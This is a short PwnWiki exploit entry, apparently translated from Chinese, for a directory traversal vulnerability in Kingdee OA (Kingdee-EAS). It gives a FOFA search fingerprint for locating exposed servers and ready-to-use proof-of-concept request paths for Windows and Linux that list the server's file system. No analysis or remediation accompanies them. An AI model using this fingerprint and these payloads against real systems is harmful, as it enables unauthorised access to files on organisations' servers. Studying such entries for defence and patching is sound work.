金蝶OA server file 目录遍历漏洞

From PwnWiki
This page is a translated version of the page 金蝶OA server file 目錄遍歷漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

金蝶OA

FOFA

app="Kingdee-EAS"

POC

Windows

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux

appmonitor/protected/selector/server_file/files?folder=/&suffix=